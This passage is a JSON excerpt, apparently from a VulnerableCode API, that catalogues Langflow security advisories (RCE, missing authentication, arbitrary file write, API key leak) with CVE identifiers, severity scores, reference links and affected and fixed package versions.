"https://github.com/langflow-ai/langflow/security/advisories/GHSA-rf6x-r45m-xv3w" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33053", "reference_id": "CVE-2026-33053", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33053" }, { "reference_url": "https://github.com/advisories/GHSA-rf6x-r45m-xv3w", "reference_id": "GHSA-rf6x-r45m-xv3w", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-rf6x-r45m-xv3w" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48830?format=api", "purl": "pkg:pypi/langflow@1.7.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-rrva-95s5-kbcf" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-zqwj-45w7-7kft" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/48845?format=api", "purl": "pkg:pypi/langflow@1.9.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ypxh-x2hy-3uhb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.0" } ], "aliases": [ "CVE-2026-33053", "GHSA-rf6x-r45m-xv3w", "PYSEC-2026-78" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-q4r1-xjfk-7bg9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49547?format=api", "vulnerability_id": "VCID-qwtw-q92t-quhz", "summary": "Langflow Missing Authentication on Critical API Endpoints\nMultiple critical API endpoints in Langflow are missing authentication controls, allowing any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-21445", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.09015", "scoring_system": "epss", "scoring_elements": "0.92791", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-21445" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/commit/3fed9fe1b5658f2c8656dbd73508e113a96e486a", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-01-06T04:55:18Z/" } ], "url": "https://github.com/langflow-ai/langflow/commit/3fed9fe1b5658f2c8656dbd73508e113a96e486a" }, { "reference_url": "https://github.com/langflow-ai/langflow/releases/tag/1.7.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/releases/tag/1.7.1" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21445", "reference_id": "CVE-2026-21445", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21445" }, { "reference_url": "https://github.com/advisories/GHSA-c5cp-vx83-jhqx", "reference_id": "GHSA-c5cp-vx83-jhqx", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-c5cp-vx83-jhqx" }, { "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx", "reference_id": "GHSA-c5cp-vx83-jhqx", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-01-06T04:55:18Z/" } ], "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48829?format=api", "purl": "pkg:pypi/langflow@1.7.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-rrva-95s5-kbcf" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-zqwj-45w7-7kft" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1" } ], "aliases": [ "CVE-2026-21445", "GHSA-c5cp-vx83-jhqx" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qwtw-q92t-quhz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49830?format=api", "vulnerability_id": "VCID-rc54-gw71-gyau", "summary": "Langflow affected by Remote Code Execution via validate_code() exec()\nLangflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-0770", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.14653", "scoring_system": "epss", "scoring_elements": "0.94612", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-0770" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://www.zerodayinitiative.com/advisories/ZDI-26-036", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-036" }, { "reference_url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52597.py", "reference_id": "CVE-2026-0770", "reference_type": "exploit", "scores": [], "url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52597.py" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0770", "reference_id": "CVE-2026-0770", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0770" }, { "reference_url": "https://github.com/affix/CVE-2026-0770-PoC", "reference_id": "CVE-2026-0770-POC", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/affix/CVE-2026-0770-PoC" }, { "reference_url": "https://github.com/advisories/GHSA-g22f-v6f7-2hrh", "reference_id": "GHSA-g22f-v6f7-2hrh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-g22f-v6f7-2hrh" }, { "reference_url": "https://www.zerodayinitiative.com/advisories/ZDI-26-036/", "reference_id": "ZDI-26-036", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-24T04:56:28Z/" } ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-036/" } ], "fixed_packages": [], "aliases": [ "CVE-2026-0770", "GHSA-g22f-v6f7-2hrh" ], "risk_score": 10.0, "exploitability": "2.0", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rc54-gw71-gyau" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/36919?format=api", "vulnerability_id": "VCID-s17d-sfjq-z7eg", "summary": "langflow v1.0.12 was discovered to contain a remote code execution (RCE) vulnerability via the PythonCodeTool component.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-42835", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0911", "scoring_system": "epss", "scoring_elements": "0.92829", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-42835" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/issues/2908", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-10-31T18:26:22Z/" } ], "url": "https://github.com/langflow-ai/langflow/issues/2908" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42835", "reference_id": "CVE-2024-42835", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42835" }, { "reference_url": "https://github.com/advisories/GHSA-56m6-4mhw-h3g5", "reference_id": "GHSA-56m6-4mhw-h3g5", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-56m6-4mhw-h3g5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/44816?format=api", "purl": "pkg:pypi/langflow@1.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1dek-kvzf-27d1" }, { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-9k4q-zwxf-euh1" }, { "vulnerability": "VCID-bb6r-1f6u-t7ed" }, { "vulnerability": "VCID-fc5h-qc2t-xqc3" }, { "vulnerability": "VCID-jt18-vv56-2fgx" }, { "vulnerability": "VCID-ncvf-vzqr-uydz" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-qwtw-q92t-quhz" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-sbea-kkfu-akgb" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-wv26-29b9-vqgg" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-ysnc-jyxb-6qcy" }, { "vulnerability": "VCID-zqwj-45w7-7kft" }, { "vulnerability": "VCID-ztx2-wefa-c7bk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.13" } ], "aliases": [ "CVE-2024-42835", "GHSA-56m6-4mhw-h3g5", "PYSEC-2024-279" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-s17d-sfjq-z7eg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37168?format=api", "vulnerability_id": "VCID-sbea-kkfu-akgb", "summary": "Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, if an arbitrary path is specified in the request body's `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is. Version 1.7.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68478", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10573", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68478" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-19T17:23:19Z/" } ], "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68478", "reference_id": "CVE-2025-68478", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68478" }, { "reference_url": "https://github.com/advisories/GHSA-f43r-cc68-gpx4", "reference_id": "GHSA-f43r-cc68-gpx4", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f43r-cc68-gpx4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/46626?format=api", "purl": "pkg:pypi/langflow@1.7.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-bb6r-1f6u-t7ed" }, { "vulnerability": "VCID-ncvf-vzqr-uydz" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-qwtw-q92t-quhz" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-rrva-95s5-kbcf" }, { "vulnerability": "VCID-sbea-kkfu-akgb" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-zqwj-45w7-7kft" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/48829?format=api", "purl": "pkg:pypi/langflow@1.7.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-rrva-95s5-kbcf" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-zqwj-45w7-7kft" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1" } ], "aliases": [ "CVE-2025-68478", "GHSA-f43r-cc68-gpx4", "PYSEC-2025-125" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sbea-kkfu-akgb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89463?format=api", "vulnerability_id": "VCID-u8mw-7znw-rfab", "summary": "Langflow has an Information Leak through Incomplete API Key Redaction\nA weakness has been identified in langflow-ai langflow up to 1.8.3. Impacted is the function remove_api_keys/has_api_terms of the file src/backend/base/langflow/api/utils/core.py of the component Flow Using API. This manipulation causes unprotected storage of credentials. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-6597", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.0156", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-6597" }, { "reference_url": "https://gist.github.com/chenhouser2025/b93261c6e651f14800a4f2e4365f357b", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR" }, { "value": "2.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "2.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "2.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/" } ], "url": "https://gist.github.com/chenhouser2025/b93261c6e651f14800a4f2e4365f357b" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6597", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6597" }, { "reference_url": "https://vuldb.com/submit/791920", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR" }, { "value": "2.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "2.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "2.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/" } ], "url": "https://vuldb.com/submit/791920" }, { "reference_url": "https://vuldb.com/vuln/358232", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR" }, { "value": "2.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "2.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/" } ], "url": "https://vuldb.com/vuln/358232" }, { "reference_url": "https://vuldb.com/vuln/358232/cti", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR" }, { "value": "2.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "2.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/" } ], "url": "https://vuldb.com/vuln/358232/cti" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*" }, { "reference_url": "https://github.com/advisories/GHSA-5jjf-wcvf-923w", "reference_id": "GHSA-5jjf-wcvf-923w", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-5jjf-wcvf-923w" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48844?format=api", "purl": "pkg:pypi/langflow@1.8.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-rrva-95s5-kbcf" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.8.4" } ], "aliases": [ "CVE-2026-6597", "GHSA-5jjf-wcvf-923w" ], "risk_score": null, "exploitability": null, "weighted_severity": null, 